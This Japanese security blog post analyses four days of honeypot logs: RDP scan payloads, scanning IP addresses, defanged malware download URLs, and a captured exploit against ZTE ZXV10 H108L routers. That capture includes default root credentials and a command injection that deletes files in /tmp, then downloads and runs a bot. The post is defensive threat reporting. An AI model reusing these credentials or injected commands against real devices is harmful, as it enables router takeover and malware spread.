sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeytrap簡易分析(196-199日目:2/25-28)


ハニーポット簡易分析】Honeytrap簡易分析(196-199日目:2/25-28)
※80ポートは別途集計

f:id:one-chick-sec:20190301012815p:plain

2/27にスキャン行為があり、大量の検知がありました。ペイロードの内容はRDPへの不正アクセスを狙ったものであり、以下となります。
ペイロード
...*%......Cookie: mstshash=Test..........
※ポート番号はランダムでした。
通信元を調査したところ、以下のIPであり、AbuseIPでも不審な送信元IPとして報告されていました。
・195[.]19[.]10[.]135 検知数:80,190 
195.19.10.135 | OOO Sirius-Project | AbuseIPDB

・195[.]19[.]10[.]195検知数:80,190
195.19.10.195 | OOO Sirius-Project | AbuseIPDB

・62[.]76[.]75[.]210 検知数:80,189
62.76.75.210 | OOO Serverland | AbuseIPDB


マルウェアダウンロード>

ポート マルウェアダウンロード先 VT
52869 hxxp://109[.]201[.]143[.]178/ai[.]mips VirusTotal
8083 hxxp://157[.]230[.]90[.]135/bins/zgp

VirusTotal

52869 hxxp://89[.]248[.]171[.]57/[.]rtbin

VirusTotal

52869 hxxp://89[.]46[.]223[.]131/Khaos[.]mips

VirusTotal

ポート 8063 への通信ですが、ペイロードがあまり見ないものだったので、調査してみました。
一つのペイロードとして検知していましたが、分かりやすくするため、ペイロードを部分に改行を適宜入れています。

POST /login.gch HTTP/1.1
User-Agent: NoPublicity ❤️
Content-Length: 420
Connection: keep-alive
Accept: */*....Frm_Logintoken=4&Username=root&Password=W!n0&oO7.


POST /manager_dev_ping_t.gch HTTP/1.
User-Agent: NoPublicity ❤️
Content-Length: 420
Connection: keep-alive
Accept: */*
&Host=;$(cd /tmp; rm -rf *; wget 
hxxp://xxx[.]xxx[.]xxx[.xxx/bins/zgp; chmod 777 zgp; ./zgp selfrep.zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit

POST /getpage.gch?pid=1001&logout=1 HTTP/1.1
User-Agent: NoPublicity❤️
Content-Length: 420
Connection: keep-alive..Accept: */*....broke bitches


ZTE ZXV10 H108L Router に存在する脆弱性に関する攻撃であり、以下の流れで攻撃を実施したと推測されます。
①ルータへログイン(ID:root Password:W!n0&oO7)
②/tmp/配下へ移動し、ファイルを削除。その後、マルウェアをダウンロード
③ルータからログアウト

<参考>

routersploit/zxv10_rce.py at master · threat9/routersploit · GitHub
ZTExploit/ztexploit.py at master · stasinopoulos/ZTExploit · GitHub


<「NOTICE」からの通信>
検知はありませんでした。

以上となります。